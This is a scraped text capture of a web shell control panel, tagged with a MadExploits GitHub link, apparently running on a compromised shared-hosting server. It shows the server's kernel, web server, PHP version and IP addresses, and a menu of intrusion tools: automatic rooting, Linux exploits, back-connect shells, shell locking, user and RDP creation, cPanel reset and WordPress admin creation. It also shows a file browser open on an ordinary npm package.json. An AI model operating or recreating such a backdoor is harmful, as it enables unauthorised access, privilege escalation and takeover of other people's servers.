Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.141.47.178
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-nodejs16 /
root /
usr /
lib /
node_modules /
npm /
node_modules.bundled /
validate-npm-package-license /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE
11.09
KB
-rw-r--r--
index.js
1.88
KB
-rw-r--r--
package.json
748
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "validate-npm-package-license", "description": "Give me a string and I'll tell you if it's a valid npm package license string", "version": "3.0.4", "author": "Kyle E. Mitchell <kyle@kemitchell.com> (https://kemitchell.com)", "contributors": [ "Mark Stacey <markjstacey@gmail.com>" ], "dependencies": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" }, "devDependencies": { "defence-cli": "^2.0.1", "replace-require-self": "^1.0.0" }, "keywords": [ "license", "npm", "package", "validation" ], "license": "Apache-2.0", "repository": "kemitchell/validate-npm-package-license.js", "scripts": { "test": "defence README.md | replace-require-self | node" } }
Close